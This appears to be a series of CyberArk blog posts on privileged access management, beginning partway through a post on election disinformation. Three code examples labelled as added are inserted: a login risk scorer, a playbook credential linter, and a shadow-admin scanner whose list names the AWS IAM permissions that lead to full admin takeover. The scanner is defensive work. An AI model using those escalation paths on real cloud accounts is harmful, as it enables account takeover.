As we saw with the Twitter hack and subsequent crypto scam earlier this year, no channel is safe. Identity-centric attacks designed to steal access to social media profiles could be weaponized to spread disinformation at the most inopportune time. While disinformation about a candidate may be more easily dismissed, attackers could subvert these trusted platforms to push false information about polling locations, polling hours and election results before polls close, affecting voters everywhere.

Combine these attacks with the growing use of deepfakes – synthetic media in which a person’s face, voice or actions in existing images, audio or video are fabricated or altered using machine learning – and the opportunities for disinformation have never been greater.

We should expect attackers to continue to target government agencies and websites as an avenue to push misinformation. Organizations like the CDC could be targeted to promote COVID-19 related disinformation on or before election day. Attackers, for example, could potentially suppress in-person voting by releasing false information on COVID outbreaks in targeted counties, or push public opinion in the direction of one campaign or another by promoting false information about vaccines, outbreaks and more.

Disinformation attacks could also provide false voting information for both mail-in and in-person ballots, release fake election results early to inhibit continued voting and more.

Protecting U.S. Elections Starts with Securing Privileged Access

Many of the attacks mentioned above have been battle-tested by threat actors in the private sector. What we’ve learned from studying these attacks is that obtaining and exploiting privileged credentials is a top priority for attackers. Privileged access gives attackers the ability to reach critical systems, spread ransomware, exfiltrate sensitive information, compromise social channels, and more.

Securing the U.S. elections in 2020 and beyond requires a comprehensive approach that enforces Identity Security with a strong foundation in privileged access management. This can harden defenses against a fluid attack landscape, protect against evolving vulnerabilities, and minimize the ability for attackers to exploit the people associated with the campaigns.

To stay up to date on emerging attack techniques and research, visit the CyberArk Threat Research blog.

5 Best Practices for Securing Privileged Access and Identities for the Cloud Management Console
https://www.cyberark.com/blog/5-best-practices-for-securing-privileged-access-and-identities-in-the-cloud-management-console/ (Tue, 20 Oct 2020 15:53:40 +0000; https://www.cyberark.com/?p=103884)

Over the next few weeks, we’ll explore best practices for securing privileged access and identities in common cloud scenarios. This series can help guide effective risk reduction strategies for today and for the future as cloud workloads evolve.

First up, we’re looking at cloud management consoles, which are used by admins to set up the entire cloud environment, oversee all types of cloud activities (e.g., usage tracking, data integration, resource deployment and more) and configure operational and security settings. Before we dive in, here’s a look at the current state of the cloud.

How Are Enterprises Adopting Cloud?

While achieving a fully cloud-based IT infrastructure may be an ultimate digital transformation goal for some organizations, the vast majority are taking a hybrid approach today. According to a recent industry study, 93% of enterprises have a multi-cloud strategy in place. Meanwhile, as the world adapts to new realities, software-as-a-service (SaaS) use continues to skyrocket, enabling companies to conduct critical business and empower remote workforces.

There’s no denying the business benefits of deploying cloud infrastructure and running enterprise applications in the cloud – enhanced flexibility, simplified operations, cost savings and scalability are just a few. Yet every cloud deployment scenario creates new risk. This is particularly true in the wake of COVID-19. As leaders accelerate their cloud journeys to digitize quickly, attackers are targeting critical data and assets in the cloud in earnest. Within the first few months of 2020 alone, cyber attacks targeting the cloud grew by a staggering 630%.

Now more than ever, it’s important for organizations to fully understand their role in securing cloud workloads as part of the shared responsibility model. While cloud providers are responsible for the cloud infrastructure itself, cloud customers must secure their data, applications, operating systems, supporting infrastructure and other assets running in the cloud environment.

Privileged accounts associated with human users and application and machine identities are exceptionally powerful and highly susceptible to compromise in the cloud. Protecting privileged access in these environments is paramount, and the onus lies on the cloud customer. In fact, more than half of the top cloud computing threats today can be mitigated with strong privileged access management (PAM) and identity and access management (IAM) controls.

5 Best Practices for Securing Privileged Access in Cloud Management Consoles

Since cloud management consoles and portals enable full control of an organization’s cloud resources, they are prime targets for cyber attackers, and all access to them must be secured and monitored. This is particularly true for root-level accounts – the accounts with unrestricted administrative privileges, such as the AWS account root user, the Azure AD Global Administrator role and the Google Cloud super admin account.

1. Treat all cloud management console access (for both human and machine users) as privileged. First, identify what permissions a user or application/machine needs to do their specified job. Build roles for each user persona, giving them access to only what they need by following the principle of least privilege. Enforce privileged access management controls including session isolation, monitoring, and credential rotation to reduce risk.

2. Implement just-in-time access to reduce the attack surface. By providing just-in-time access to the cloud management console, versus standing access, permissions are provided when the session is launched – helping to ensure that only the right users have access to the right assets at the right time, and only for a certain amount of time.

3. Secure all human access to the cloud console using single sign-on (SSO) and multi-factor authentication (MFA). Whether access to the cloud console is standing or temporary, human access should be protected by SSO and MFA. SSO makes it easier for users to access their work applications in one place without having to remember multiple passwords. Additionally, SSO via SAML to the cloud console enables federated users to assume roles within the cloud provider. A role is an IAM identity with a specific set of permissions; it is not tied to a particular user, has no long-term credentials and can be assumed only by the principals its trust policy allows. Assuming a role yields short-lived credentials that are valid for that session only. In parallel, MFA confirms that users are who they say they are by requiring them to pass multiple authentication challenges.

4. Secure API and automated access to the cloud management console. Cloud management consoles and portals can be accessed by automated scripts via API access keys. These API keys are highly privileged and very powerful – for example, they can enable a script or user to stop or start a virtual server, copy a database or even wipe out entire workloads. To protect your cloud workloads, securing API keys and applying least privilege is imperative.

5. Consistently apply access policies to administrators across multi-cloud, on-premises, and hybrid environments. One compromised admin is all it takes to delete your whole cloud environment configuration. Strong privileged access oversight is necessary for security and audit purposes. Record admin activity and monitor active sessions, assigning session risk scores based on pre-defined risky behavior and activity, such as accessing the console during off-hours or from irregular locations. This enables organizations to identify misuse fast and terminate sessions when a potential attack is suspected.
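The session risk scoring described in practice 5 can be implemented as a small triage step over console sign-in events. The following is an added example, not CyberArk product logic: it scores CloudTrail-style ConsoleLogin events using assumed weights for the no-MFA, off-hours, root-user and unfamiliar-network signals and flags sessions that cross an assumed termination threshold. The three events, the per-user "known networks" baseline (a stand-in for the geolocation and behavior history a real deployment would use), the working-hours window and the weights are all constructed for this example.

```python
"""Score cloud console admin sessions from CloudTrail-style ConsoleLogin events.

Added example, not CyberArk product code. The events, the per-user baseline,
the weights and the threshold below are all assumptions for illustration.
"""
import ipaddress
from datetime import datetime, timezone

# Constructed baseline: networks each admin normally signs in from.
KNOWN_NETWORKS = {
    "alice": ["198.51.100.0/24"],
    "bob": ["203.0.113.0/24"],
}

WORK_HOURS_UTC = (7, 19)  # assumed normal working window, [start, end)

# Assumed weights; tune to your environment.
WEIGHTS = {
    "root_user": 50,        # the root user should never sign in interactively
    "no_mfa": 40,
    "unknown_network": 30,
    "off_hours": 20,
    "login_failure": 10,
}
TERMINATE_THRESHOLD = 50    # assumed: at or above this, cut the session and alert


def risk_factors(event):
    """Return the names of the risk signals present in one ConsoleLogin event."""
    ident = event["userIdentity"]
    user = ident.get("userName") or "root"
    factors = []
    if ident.get("type") == "Root":
        factors.append("root_user")
    if event.get("additionalEventData", {}).get("MFAUsed") != "Yes":
        factors.append("no_mfa")
    when = datetime.fromisoformat(event["eventTime"].replace("Z", "+00:00"))
    hour = when.astimezone(timezone.utc).hour
    if not WORK_HOURS_UTC[0] <= hour < WORK_HOURS_UTC[1]:
        factors.append("off_hours")
    src = ipaddress.ip_address(event["sourceIPAddress"])
    known = [ipaddress.ip_network(n) for n in KNOWN_NETWORKS.get(user, [])]
    if not any(src in net for net in known):
        factors.append("unknown_network")  # root has no baseline, so it always trips this
    if event.get("responseElements", {}).get("ConsoleLogin") == "Failure":
        factors.append("login_failure")
    return factors


def score_event(event):
    """Return (score, factors) for one event."""
    factors = risk_factors(event)
    return sum(WEIGHTS[f] for f in factors), factors


def triage(events):
    """Return one verdict per event: who, when, score, factors, terminate?"""
    verdicts = []
    for ev in events:
        score, factors = score_event(ev)
        verdicts.append({
            "user": ev["userIdentity"].get("userName") or "root",
            "time": ev["eventTime"],
            "score": score,
            "factors": factors,
            "terminate": score >= TERMINATE_THRESHOLD,
        })
    return verdicts


# Constructed sample events in the shape CloudTrail uses for ConsoleLogin.
SAMPLE_EVENTS = [
    {   # normal: known network, MFA, business hours
        "eventName": "ConsoleLogin", "eventTime": "2020-10-20T10:15:00Z",
        "userIdentity": {"type": "IAMUser", "userName": "alice"},
        "sourceIPAddress": "198.51.100.23",
        "additionalEventData": {"MFAUsed": "Yes"},
        "responseElements": {"ConsoleLogin": "Success"},
    },
    {   # suspicious: unfamiliar network, no MFA, 02:40 UTC
        "eventName": "ConsoleLogin", "eventTime": "2020-10-20T02:40:00Z",
        "userIdentity": {"type": "IAMUser", "userName": "bob"},
        "sourceIPAddress": "192.0.2.77",
        "additionalEventData": {"MFAUsed": "No"},
        "responseElements": {"ConsoleLogin": "Success"},
    },
    {   # root sign-in with MFA during working hours: still high risk
        "eventName": "ConsoleLogin", "eventTime": "2020-10-20T14:00:00Z",
        "userIdentity": {"type": "Root"},
        "sourceIPAddress": "203.0.113.8",
        "additionalEventData": {"MFAUsed": "Yes"},
        "responseElements": {"ConsoleLogin": "Success"},
    },
]

if __name__ == "__main__":
    for v in triage(SAMPLE_EVENTS):
        print(v)
```

The point of the weights is that a single strong signal (root sign-in, no MFA) is enough on its own to cross the threshold, while weaker signals (off-hours, new network) only do so in combination; in production the baseline would be learned from history rather than hardcoded, and the terminate decision would feed a session-management control rather than a print statement.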

Attackers can find and abuse permissions to escalate privileges and become full cloud admins. What’s more, they can use these permissions to create stealthy “shadow admin” entities – identities that sit outside any admin group but hold permissions (such as the ability to attach a policy to, or create an access key for, an admin user) that lead to full administrative control – and keep them as backdoors into the cloud environment. Scan your environment to discover privileged entities (users, groups and roles) and expose these shadow admins.
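A shadow-admin scan is, at its core, a policy evaluation: for each identity, does any Allow statement grant a permission that is itself a path to full control? The following is an added example, not CyberArk’s discovery tooling. The principals and their policy documents are constructed in AWS IAM JSON syntax; the list of escalation actions is a well-known subset rather than an exhaustive one; and, as an assumption to keep the example short, statements with a Condition, with NotAction/NotResource, or scoped to specific resources are treated as non-escalating.

```python
"""Flag "shadow admins": identities outside the admin group whose permissions
still give them a path to full administrative control.

Added example, not CyberArk's discovery tooling. The policy documents are
constructed in AWS IAM JSON syntax; the escalation list is a well-known subset,
not an exhaustive one, and conditional or resource-scoped grants are skipped.
"""
import fnmatch

# Single permissions that let a principal grant itself or another identity
# more privilege when allowed on Resource "*".
ESCALATION_ACTIONS = {
    "iam:CreateAccessKey": "mint API keys for any user, including admins",
    "iam:CreateLoginProfile": "set a console password for a user that has none",
    "iam:UpdateLoginProfile": "reset another user's console password",
    "iam:AttachUserPolicy": "attach AdministratorAccess to a user",
    "iam:AttachRolePolicy": "attach AdministratorAccess to a role",
    "iam:PutUserPolicy": "write an inline admin policy on a user",
    "iam:PutRolePolicy": "write an inline admin policy on a role",
    "iam:AddUserToGroup": "join an admin group",
    "iam:UpdateAssumeRolePolicy": "make an admin role assumable by self",
}
# Combinations where every action in the set is needed for the path.
ESCALATION_COMBOS = [
    ({"iam:PassRole", "lambda:CreateFunction", "lambda:InvokeFunction"},
     "run code under a privileged Lambda execution role"),
    ({"iam:PassRole", "ec2:RunInstances"},
     "launch an instance with a privileged instance profile"),
]
CANDIDATES = (set(ESCALATION_ACTIONS)
              | {a for combo, _ in ESCALATION_COMBOS for a in combo}
              | {"*"})  # "*" only matches the literal Action "*"


def _as_list(value):
    return value if isinstance(value, list) else [value]


def allowed_actions(policy, candidates):
    """Return the candidate actions the policy grants on Resource "*".

    IAM action patterns are case-insensitive and use * wildcards; an explicit
    Deny overrides any Allow. Conditional statements and NotAction/NotResource
    forms are skipped here (assumption: out of scope for this example).
    """
    allowed, denied = set(), set()
    for stmt in _as_list(policy.get("Statement", [])):
        if stmt.get("Condition") or "NotAction" in stmt or "NotResource" in stmt:
            continue
        if "*" not in _as_list(stmt.get("Resource", [])):
            continue  # grant scoped to specific resources: not treated as escalation
        bucket = allowed if stmt.get("Effect") == "Allow" else denied
        for pattern in _as_list(stmt.get("Action", [])):
            bucket.update(a for a in candidates
                          if fnmatch.fnmatchcase(a.lower(), pattern.lower()))
    return allowed - denied


def classify(principal):
    """Return (verdict, reasons) where verdict is admin, shadow-admin or ok."""
    grants = set()
    for policy in principal["policies"]:
        grants |= allowed_actions(policy, CANDIDATES)
    if "*" in grants:
        return "admin", ["Action * on Resource *"]
    reasons = [f"{a}: {ESCALATION_ACTIONS[a]}"
               for a in sorted(grants & set(ESCALATION_ACTIONS))]
    for combo, why in ESCALATION_COMBOS:
        if combo <= grants:
            reasons.append("+".join(sorted(combo)) + ": " + why)
    return ("shadow-admin" if reasons else "ok"), reasons


def scan(principals):
    """Map each principal name to its (verdict, reasons)."""
    return {p["name"]: classify(p) for p in principals}


# Constructed principals with their attached policy documents.
SAMPLE_PRINCIPALS = [
    {"name": "cloud-admins", "type": "group", "policies": [
        {"Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}]}]},
    {"name": "backup-svc", "type": "role", "policies": [
        {"Statement": [
            {"Effect": "Allow", "Action": "s3:*", "Resource": "arn:aws:s3:::backups/*"},
            {"Effect": "Allow", "Action": "ec2:Describe*", "Resource": "*"}]}]},
    {"name": "helpdesk", "type": "user", "policies": [   # looks harmless, is not
        {"Statement": [
            {"Effect": "Allow", "Resource": "*",
             "Action": ["iam:List*", "iam:Get*", "iam:UpdateLoginProfile", "iam:CreateAccessKey"]},
            {"Effect": "Deny", "Action": "iam:CreateAccessKey", "Resource": "*"}]}]},
    {"name": "lambda-deployer", "type": "user", "policies": [
        {"Statement": [{"Effect": "Allow", "Resource": "*",
                        "Action": ["iam:PassRole", "lambda:*"]}]}]},
]

if __name__ == "__main__":
    for name, (verdict, reasons) in scan(SAMPLE_PRINCIPALS).items():
        print(f"{name}: {verdict} {reasons}")
```

The helpdesk user is the instructive case: it is not in an admin group and most of its permissions are read-only, yet iam:UpdateLoginProfile on every user lets it reset an administrator’s console password. Note also that the Deny on iam:CreateAccessKey correctly removes that path, which is why the scan has to evaluate Deny statements rather than just grep for dangerous actions.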

A Secure Cloud Is Your Business Advantage

Today, you may be extending cloud initiatives with DevOps pipelines to increase business agility. Or maybe you’re looking at on-demand compute and storage to drive cost savings. No matter where you are on your cloud journey, privileged access and identity policies must be enforced consistently across your organization to reduce exposure and protect your critical assets. Get practical guidance in our eBook, “Securing Privileged Access and Identities In 4 Key Cloud Scenarios,” and visit cyberark.com/cloud. Be sure to check back soon to explore part two of our series on securing your organization’s dynamic cloud infrastructure.

Don’t Stop Risk Distancing. Remote Work Is Here to Stay
https://www.cyberark.com/blog/dont-stop-risk-distancing-remote-work-is-here-to-stay/ (Wed, 14 Oct 2020 14:22:22 +0000; https://www.cyberark.com/?p=103713)

A Look Back: The Sprint to Remote Work Created Security Gaps

The global shift to remote work happened fast: millions of employees went home last March and adjusted to new ways of working – thanks to the IT teams and cybersecurity leaders working tirelessly behind the scenes to make it happen.

The risk landscape changed dramatically during this period of transition. Global VPN usage skyrocketed, while 66% of remote employees adopted new communication and collaboration tools and 77% started using personal devices to access corporate systems. Existing security policies were relaxed or abandoned altogether in the name of business continuity, and it wasn’t long before risky work-from-home shortcuts, such as sharing corporate devices with family members, became hard-to-break habits that put organizations in danger of identity-related breaches.

Opportunistic attackers massively scaled their attacks but continued using tried-and-true methods like phishing, social engineering and brute force to steal credentials and use them to gain illegitimate privileged access to sensitive assets. A recent Identity Defined Security Alliance (IDSA) study reveals that nearly 80% of organizations have experienced an identity-related breach in the past two years (and 19% have since the pandemic crisis started). Employees were targeted in 75% of those breaches.

Where We Are Today: Identity Security Is a Work in Progress

Today, most employees are still working from home. While social distancing mandates have eased in some geographies, it’s becoming increasingly clear that the way we work has changed for good. According to a recent PwC study, 83% of office workers expressed interest in working remotely at least one day a week, while more than half of executives (55%) plan to extend work-from-home options for the long term.

To keep users, workstations and critical assets secure in this new reality, security programs and policies must evolve. Yet for many organizations, there is much work to be done. Our remote work study found 40% of organizations have not yet increased security protocols despite significant changes to remote access needs and cloud application use. According to the IDSA study, less than 50% of organizations have fully implemented any of the following strategies:

  • Requiring multi-factor authentication (MFA) for all privileged access
  • Granting privileged access according to the principle of least privilege (meaning each user has only the minimum level of access needed to do their job)
  • Revoking access upon detection of a high-risk event associated with that identity
  • Continuously discovering all privileged access rights and user access rights
  • Transparently auditing and enforcing application access
  • Using device characteristics and expected user behavior for authentication

Where to Go from Here: Practice Risk Distancing to Secure the Remote Workforce

By following these five best practices for risk distancing, you can master the basics, align security controls with the evolving risk landscape, and strategically mature your program to mitigate the risk of identity-based attacks:

Secure Remote Access for all Users. Both remote employees and third-party vendors need access to enterprise resources to do their jobs. Yet traditional approaches like using VPNs can frustrate users, add risk with overly broad network access and create administrative and helpdesk headaches. As organizations settle into the remote work reality, many are seeking to provide convenient, secure remote access to enterprise applications without VPNs. They’re also looking for ways to secure third-party remote vendor access to critical systems using Zero Trust approaches and just-in-time provisioning.

It is important to note – if you do still use a VPN, it’s critical to secure VPN access with MFA to reduce risk.

Strengthen Workstations with MFA. Multi-factor authentication (MFA) protects user devices, logins, applications and even VPN connections with stronger authentication than passwords alone. User-friendly authentication methods like push notifications, Windows Hello, Apple Touch ID, YubiKeys or mobile authenticator apps help keep employees productive and home-based work environments safe. Since many employees admit to reusing passwords between work and personal accounts, passwordless authentication (for example, biometrics that use built-in smartphone capabilities to confirm identities) is fast becoming a top security priority and should be considered.

Lock Down Privilege on the Endpoint. In the wrong hands, local administrative rights can be used to establish a foothold leading to further compromise such as ransomware, privilege escalation attacks, and lateral movement. Fundamental user control begins with removing these admin rights from employee workstations. To do this, first identify where local admin rights exist across your distributed workforce. Then, remove local admin rights and institute just-in-time provisioning to effectively implement least privilege and keep users productive.

Don’t stop there. Since 37% of remote workers admit to insecurely saving passwords in browsers on corporate devices, credential theft blocking capabilities are key. Additionally, strong application control enables users to work with their preferred tools and workflows while restricting or blocking risky applications.

Manage Access to Applications With SSO. Adaptive single sign-on (SSO) enables a secure and frictionless sign-in experience for both internal and external users that adjusts automatically based on risk. By managing access to applications using SSO capabilities, you can improve security through reduced use of passwords, increased productivity with simplified access to employee resources, and enhanced IT ability to meet compliance requirements.

Educate Employees. A staggering 99% of IDSA survey respondents who have experienced an identity-related breach in the past two years believe these breaches were preventable. The majority (71%) said better security awareness training could have helped them avoid an attack. Ongoing education on common cyber threats, information handling guidelines, and security best practices for remote work – such as using strong passwords, encrypting home Wi-Fi networks, and only using company-sanctioned collaboration tools – will go a long way. Plus, regular Red Team exercises can help test defenses and inform education programs to drive continuous improvement.

The rise in remote work has created new challenges, but it also presents new opportunities for employers and employees alike. To succeed in this new normal, Jason Fried, author of “Remote: Office Not Required,” encourages organizations to “focus on reaping the great benefits and mitigating the drawbacks.”

To learn how CyberArk solutions can help you protect your critical assets and workstations while empowering users wherever they work, visit our Risk Distancing Resource Center and join our webinar, “Four Key Recommendations for Securing Remote Work” on Wednesday, October 21, 2020 at 9:00 a.m. EDT.

Securely Automate IT Tasks with Ansible and CyberArk
https://www.cyberark.com/blog/securely-automate-it-tasks-with-ansible-and-cyberark/ (Thu, 08 Oct 2020 15:35:27 +0000; https://www.cyberark.com/?p=103455)

Over the past few years, IT teams have embraced IT automation as a powerful tool to eliminate repetitive tasks, improve efficiency and consistency, and boost productivity and collaboration. The business realities of 2020 are propelling a new wave of automation as many organizations focus on building resilience and scaling digital transformation efforts, while keeping costs down.

Red Hat’s Ansible is one of the leading IT automation platforms and is widely used by organizations to automate a broad range of IT functions including application deployment, configuration management and continuous delivery. Time-consuming tasks and problems can be tackled efficiently by writing one script, then scaling across the organization using policy and governance to track and monitor changes. With Ansible, which is available in both enterprise and open source versions, organizations can drive complexity out of their environments and accelerate IT initiatives.

Ansible Playbooks Execute IT Automation Functions

Playbooks are the files in which Ansible’s automation code is written. They contain the instructions that execute the various configuration, deployment and orchestration functions to simplify processes. For example, playbooks can describe a policy for remote systems to enforce, or a set of steps in a general IT process such as managing configuration and deployment to remote machines. Playbooks can be relatively simple – orchestrating a short, ordered list of tasks – or more advanced; for example, sequencing multi-tier rollouts with rolling updates, delegating actions to other hosts, as well as interacting with monitoring systems. Designed for ease of use, playbooks are written in YAML, a basic human-readable text format, and are relatively easy to understand, write and use.

Ansible Playbooks are highly privileged. To access, manage and configure IT resources – such as a VM, server or cloud compute instance – playbooks require appropriate credentials and secrets. If these powerful privileged credentials are not properly managed and secured – or left hardcoded in playbooks or scripts – they become attractive targets for attackers. Using compromised credentials, attackers can access sensitive IT resources and services. Learn more about how automation can expand the privileged attack surface here.
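The hardcoded-credential problem is easy to check for before a playbook is committed. The following linter is an added example, not part of the CyberArk/Red Hat integration: it flags literal values under secret-looking keys and credentials embedded in URLs, while accepting Ansible Vault values and Jinja expressions (a variable reference or a lookup, which is how a playbook would pull a credential from CyberArk at run time). The playbook text is constructed for this example, and the cyberarkpassword lookup call in it is illustrative of the pattern rather than a verified invocation of that plugin.

```python
"""Lint Ansible playbooks for hardcoded credentials.

Added example, not part of the CyberArk/Red Hat integration. It flags literal
values under secret-looking keys and credentials embedded in URLs, while
accepting Ansible Vault values and Jinja lookups (the CyberArk lookup call in
the sample is illustrative). The playbook text is constructed for this example.
"""
import re

# "key: value" on one line, with or without a leading list dash.
KEY_VALUE = re.compile(r"^\s*(?:-\s+)?(?P<key>[A-Za-z0-9_.-]+)\s*:\s*(?P<value>.*)$")
# Keys whose value should never be a literal: a secret word as its own component
# (so "db_password" and "ansible_become_pass" match, "bypass_check" does not).
SECRET_KEY = re.compile(
    r"(?:^|[_.-])(?:pass(?:word|wd|phrase)?|secret|token|api_?key|private_key)(?:$|[_.-])",
    re.IGNORECASE,
)
# Values that are references rather than literals: Jinja expressions (lookups,
# variables) and vault-encrypted scalars. An empty value means a nested mapping.
SAFE_VALUE = re.compile(r"^(?:\{\{.*\}\}|!vault\b.*|)$")
# scheme://user:password@host anywhere on a line.
URL_CREDS = re.compile(r"[a-z][a-z0-9+.-]*://[^/\s:@]+:[^/\s@]+@", re.IGNORECASE)


def lint(text):
    """Return [(line_no, kind, line)] findings for a playbook's text."""
    findings = []
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.rstrip()
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = KEY_VALUE.match(line)
        if m and SECRET_KEY.search(m.group("key")):
            value = m.group("value").strip().strip("\"'")
            if not SAFE_VALUE.match(value):
                findings.append((no, "hardcoded_secret", line.strip()))
        if URL_CREDS.search(line):
            findings.append((no, "credentials_in_url", line.strip()))
    return findings


# Constructed playbook mixing good and bad practice (vault ciphertext is fake).
PLAYBOOK = """\
- name: Configure application host
  hosts: app
  vars:
    ansible_user: deploy
    db_password: "Sup3rS3cret!"
    api_key: "{{ lookup('cyberark.pas.cyberarkpassword', appid='ansible', query='safe=App;object=api_key') }}"
    admin_pass: !vault |
      $ANSIBLE_VAULT;1.1;AES256
      66353437613161303264623832303634
    smtp_token: "{{ smtp_token_from_vault }}"
  tasks:
    - name: Fetch release artifact
      get_url:
        url: https://deploy:hunter2@artifacts.example.com/app.tgz
        dest: /tmp/app.tgz
    - name: Restart service as root
      command: systemctl restart app
      become: true
      vars:
        ansible_become_pass: letmein
"""

if __name__ == "__main__":
    for no, kind, line in lint(PLAYBOOK):
        print(f"line {no}: {kind}: {line}")
```

Run against the sample, the linter reports the literal database password, the credentials inside the artifact URL and the literal become password, and stays quiet about the vaulted value and the two Jinja expressions. A check like this belongs in pre-commit or CI so that the only way for a playbook to obtain a credential is through a vault or a lookup against the secrets manager.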

Simplify Ansible Playbooks with Native Out-of-the-Box Integrations

CyberArk and Red Hat provide several native integrations to enhance Ansible security and protect automation environments. These integrations empower DevOps and security teams to automatically secure and manage the credentials and secrets used by IT resources and CI/CD tools.

CyberArk Application Access Manager integrations with Red Hat offer major benefits for both operations and security, including:

  • Dramatically simplifying how operations teams write and use playbooks to securely access the credentials they need to do their job – automating IT functions. Playbooks can seamlessly access, then use, these credentials, which are centrally managed and secured by the CyberArk Core Privileged Access Security solution. For example, when using Ansible, simply use a drop-down menu to select CyberArk as the secrets vault.
  • Secrets used by Ansible Playbooks are automatically secured and rotated by CyberArk based on the organization’s policy. This eliminates the need for operations to manually change and even populate credentials used by the playbooks.

Another important security benefit, and a common question from security teams, is how can security help ensure that each of the various teams across the enterprise writing playbooks only have access to the secrets they need to automate their specific IT tasks? For example, Team A’s playbooks should only have access to the specific secrets and credentials they are allowed, while Team B should only have access to theirs. The CyberArk Red Hat integration solves this separation of duties issue by extending CyberArk’s application and machine identity functions into Ansible Tower’s role-based access controls (RBAC).

Visit CyberArk at AnsibleFest 2020 – Without Leaving Your Workspace

Automation is a strategic component of modernization and digital transformation. To explore how your organization can benefit, attend AnsibleFest – a free, virtual experience on October 13-14, 2020.

See a powerful CyberArk Red Hat integration in action in the session “Defending a Defense Company with Ansible Automation Platform” on Tuesday, October 13 at 10:00 a.m. EDT. Explore a leading defense firm’s automation journey using Ansible to securely configure its global network. You’ll learn how the company’s Ansible team was able to rapidly develop playbooks to use privileged credentials managed by CyberArk to automate the configuration process and quickly rotate device passwords based on policy or an incident – driving significant business advantage.

During AnsibleFest, be sure to drop by CyberArk’s virtual booth and talk with our technical team.

If you’d like to learn more about securing your Ansible automation environments with CyberArk and Red Hat, including CyberArk’s secrets management solutions, check out these resources:

Simplified UX for Improved Platform Management: A Win-Win for Expanding Your PAM Program
https://www.cyberark.com/blog/simplified-ux-for-improved-platform-management-a-win-win-for-expanding-your-pam-program/ (Tue, 06 Oct 2020 12:30:16 +0000; https://www.cyberark.com/?p=103441)

Rule No. 1 of Google’s “10 Things” philosophy is simple: Focus on the user and all else will follow. It’s solid advice, whether you’re in the business of online search, eCommerce, healthcare or enterprise security software. Studies show that by positioning users at the core of product development, companies can simplify customer acquisition and increase retention, lower support costs and, most important, amplify product value for their customers. User experience (UX) is key to development and adoption of an effective privileged access management program and is particularly important for PAM administrators.

In the age of digital transformation, PAM administration is not a one-and-done task. Security teams must work to implement and maintain consistent controls throughout evolving IT infrastructure. A central challenge for PAM administrators is keeping pace with the business as it adds new technology on-premises, in the cloud and throughout the DevOps pipeline. To effectively manage privileged credentials and identities, empower IT admins to securely administer rapidly changing infrastructure and protect the organization’s most critical systems and data, administrators need centralized visibility and control.

This brief demo video highlights CyberArk’s platform management view, a simplified interface for PAM administrators to centrally manage security policies for each type of IT system within their organization.

In this example, we’re securing credentials and sessions for Facebook admins:

While they are not shown in this demonstration, CyberArk does offer a wide range of REST APIs for managing platforms to streamline administrators’ daily workflows via automation. Find all REST APIs in our documentation.

The platform management view feature, which also accelerates adoption of key privileged access management controls, is available in the CyberArk Privileged Access Management Solution and CyberArk Privilege Cloud, our PAM as a Service offering.

From the platform management view, administrators can not only manage existing infrastructure but also rapidly add CyberArk Marketplace plugins that securely manage credentials and isolate and monitor privileged sessions to a given platform. CyberArk customers can download over 300 certified technology integrations for credential and session management, allowing them to rapidly secure access to web and SaaS applications, security appliances, smart devices in the Internet of Things (IoT) and more.

The ability to simplify administration with the platform management view has several benefits for any PAM program. First, centralized visibility and control improves the operational efficiency of key tasks for PAM administration. This, in turn, reduces risk by enabling PAM programs to enforce consistent controls across the enterprise. Risk is further mitigated through facilitated adoption of privileged session management, a critical element of any strong PAM program.

Simple PAM administration. Simple PAM adoption. That’s a win-win.

Interested in exploring more PAM UX features and best practices? Check out our guide for jump-starting your program with PAM as a Service.

October is National Cybersecurity Awareness Month: Do Your Part. Meet Pam and #BeCyberSmart
https://www.cyberark.com/blog/october-is-national-cybersecurity-awareness-month-do-your-part-meet-pam-and-becybersmart/ (Thu, 01 Oct 2020 14:50:43 +0000; https://www.cyberark.com/?p=103361)

October is National Cybersecurity Awareness Month (#NCSAM). Now in its 17th year, the month-long event promotes cybersecurity best practices and resources to help citizens stay safe and secure online.

This year’s theme, “Do Your Part. #BeCyberSmart,” reminds us that cybersecurity is a shared responsibility and we each have a role to play. Everyone should visit the Cybersecurity and Infrastructure Security Agency site to brush up on tips for securing their digital profile – from picking strong passwords and safeguarding connected devices with multi-factor authentication (MFA), to securing home networks and keeping software up to date.

Businesses must also do their part to make the digital world a safer place for customers, employees and partners. This begins with protecting access to their critical enterprise assets.

Most targeted cyber attacks today follow a similar pattern. Attackers find privileged credentials – those that provide elevated access and permissions – and use them to gain access to an organization’s most valuable systems and information. That’s why it’s so important to manage and secure these powerful privileges for human, application and machine users with privileged access management.

Like many technology terms, privileged access management doesn’t exactly roll off the tongue, so it has an acronym to make things easy: “PAM.” This inspired a special addition to the CyberArk family to help us promote National Cybersecurity Awareness Month.

We’re proud to introduce “Pam,” our cybersecurity heroine and fearless purveyor of privileged access management who fights the good fight and helps you stay one step ahead of attackers. Throughout the month, you’ll see Pam pop up on our social media channels, providing tips and practical advice. Be sure to follow us on Twitter, LinkedIn and Facebook so you don’t miss a beat.

[Image: Meet Pam, our cybersecurity heroine]

To start, here’s a look at two reasons why your organization should join forces with Pam this National Cybersecurity Awareness Month.

Pam is All About Maximum Security

In modern organizations, privilege is everywhere – in the cloud, on endpoint devices, in applications, within automated processes, and throughout the DevOps pipeline. As digital transformation initiatives accelerate and more workloads and applications move to the cloud, the number of privileged credentials continues to grow exponentially.

Obtaining privileged credentials is a top priority for malicious insiders and external attackers, as it provides the access needed to reach critical systems and accomplish evil missions, from disrupting business, to stealing digital currency, valuable intellectual property or sensitive customer data.

That’s where Pam comes in. She saves the day by securing the privileged pathways most traveled in attacks. She’s street-wise, savvy and knows it doesn’t take advanced techniques for attackers to establish a foothold – especially in the era of remote work where employee endpoints are plentiful targets.

For her, endpoint security is only part of the solution. She understands effective cybersecurity requires multiple layers of defense to defeat adversaries. Nefarious characters will find a way in, but when they do, she’ll be ready with a host of superpowers up her sleeve to stop attacks before they stop business.

Pam Never Backs Down From a Challenge. She Can Help You With Yours

Along with her many superpowers, Pam gives expert advice on everything from technology choices to process enhancements and effective organizational change management strategies.

She helps organizations get started with privileged access management by identifying exactly where their biggest risks exist, then helps business leaders know where to focus their efforts, how to measure progress and drive accountability.

She’ll tell you that an incredible PAM strategy makes it simple for everyone to do the right thing. By implementing automated, centralized and proactive controls, organizations can stop cyber criminals in their tracks.

Do your part by prioritizing privileged access management. Whether you’re just getting started or maturing your program, Pam is the defender your organization needs right now. Follow CyberArk on social and get ready to meet the next cybersecurity superhero.

